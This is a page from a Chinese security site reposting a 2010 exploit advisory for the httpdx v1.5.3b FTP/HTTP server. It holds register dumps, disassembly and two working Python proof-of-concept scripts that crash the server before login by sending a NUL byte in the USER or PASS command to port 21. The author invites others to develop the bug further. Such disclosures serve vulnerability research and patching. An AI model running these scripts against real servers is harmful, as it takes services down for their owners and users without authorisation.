首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)
来源:vfocus.net 作者:loneferret 发布时间:2010-03-15  

# Title: httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date: 13/03/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#Not to beat a dead horse, but when I saw the latest release notes
#about how he fixed a few security bugs. I figured I'd give this one
#another go at it.
#He did fix quite a few bugs, but he created this one in the process.
#I've included 2 PoCs for both the USER & PASS command.

#As always, if anyone wants to take this further, go right ahead.

#============================USER Command===============================
#CONTEXT DUMP
# EIP: 77c47b79 mov [edi],eax
# EAX: 00000000 ( 0) -> N/A
# EBX: fffffffa (4294967290) -> N/A
# ECX: 3ffff68b (1073739403) -> N/A
# EDX: 7efeff1f (2130640671) -> N/A
# EDI: 003f0000 ( 4128768) -> N/A
# ESI: 003eca36 ( 4114998) -> (heap)
# EBP: 0022dde4 ( 2285028) -> "@(>t"@@(>@@(>@@(>(>(> (stack)
# ESP: 0022ba9c ( 2275996) -> 0> (stack)
# +00: 003eca30 ( 4114992) -> USER (heap)
# +04: 00000000 ( 0) -> N/A
# +08: 00000000 ( 0) -> N/A
# +0c: 0040d663 ( 4249187) -> N/A
# +10: 003eda30 ( 4119088) -> (heap)
# +14: 003eca35 ( 4114997) -> (heap)

#disasm around:
# 0x77c47b61 and edx,0xff
# 0x77c47b67 mov [edi],edx
# 0x77c47b69 jmp 0x77c47b6f
# 0x77c47b6b xor edx,edx
# 0x77c47b6d mov [edi],edx
# 0x77c47b6f add edi,0x4
# 0x77c47b72 xor eax,eax
# 0x77c47b74 dec ecx
# 0x77c47b75 jz 0x77c47b81
# 0x77c47b77 xor eax,eax
# 0x77c47b79 mov [edi],eax
# 0x77c47b7b add edi,0x4
# 0x77c47b7e dec ecx
# 0x77c47b7f jnz 0x77c47b79
# 0x77c47b81 and ebx,0x3
# 0x77c47b84 jnz 0x77c47b0b
# 0x77c47b86 mov eax,[esp+0x10]
# 0x77c47b8a pop ebx
# 0x77c47b8b pop esi
# 0x77c47b8c pop edi
# 0x77c47b8d ret

#stack unwind:
# httpdx.exe:0040ffec
# kernel32.dll:7c80b713

#SEH unwind:
# ffffffff -> kernel32.dll:7c839ac0 push ebp

#!/usr/bin/python

import socket

buffer = "\000"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n')
s.recv(1024)
s.close


#============================PASS Command===============================

#CONTEXT DUMP
# EIP: 77c47b79 mov [edi],eax
# EAX: 00000000 ( 0) -> N/A
# EBX: fffffffa (4294967290) -> N/A
# ECX: 3ffed77d (1073665917) -> N/A
# EDX: 7efeff1f (2130640671) -> N/A
# EDI: 00c63000 ( 12988416) -> N/A
# ESI: 00c17cfe ( 12680446) -> (heap)
# EBP: 0186dde4 ( 25615844) -> @|t@@|@@|@@||| (stack)
# ESP: 0186ba9c ( 25606812) -> |)@| PASS (heap)
# +04: 00000000 ( 0) -> N/A
# +08: 00000000 ( 0) -> N/A
# +0c: 0040d729 ( 4249385) -> N/A
# +10: 00c18df8 ( 12684792) -> (heap)
# +14: 00c17cfd ( 12680445) -> (heap)

#disasm around:
# 0x77c47b61 and edx,0xff
# 0x77c47b67 mov [edi],edx
# 0x77c47b69 jmp 0x77c47b6f
# 0x77c47b6b xor edx,edx
# 0x77c47b6d mov [edi],edx
# 0x77c47b6f add edi,0x4
# 0x77c47b72 xor eax,eax
# 0x77c47b74 dec ecx
# 0x77c47b75 jz 0x77c47b81
# 0x77c47b77 xor eax,eax
# 0x77c47b79 mov [edi],eax
# 0x77c47b7b add edi,0x4
# 0x77c47b7e dec ecx
# 0x77c47b7f jnz 0x77c47b79
# 0x77c47b81 and ebx,0x3
# 0x77c47b84 jnz 0x77c47b0b
# 0x77c47b86 mov eax,[esp+0x10]
# 0x77c47b8a pop ebx
# 0x77c47b8b pop esi
# 0x77c47b8c pop edi
# 0x77c47b8d ret

#stack unwind:
# httpdx.exe:0040ffec
# kernel32.dll:7c80b713

#SEH unwind:
# ffffffff -> kernel32.dll:7c839ac0 push ebp

#!/usr/bin/python

import socket

buffer = "\000"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.recv(1024)
s.close


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Media Player V6.4.9.1 with K-L
·Oracle 11gR2 Multiple Remote P
·GOM Player v2.1.21 avi File Do
·Embedthis Appweb 3.1.2 Remote
·MicroWorld eScan Antivirus < 3
·Ruby on Rails 'protect_from_fo
·Multiple PHP Functions - Local
·PhpMyLogon v2 SQL Injection Vu
·Mackeitone Media Player (.m3u
·Open & Compact FTPd 1.2 Pre-Au
·Yahoo Player v1.0 (.m3u) Buffe
·Liquid XML Studio 2010 <= v8.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved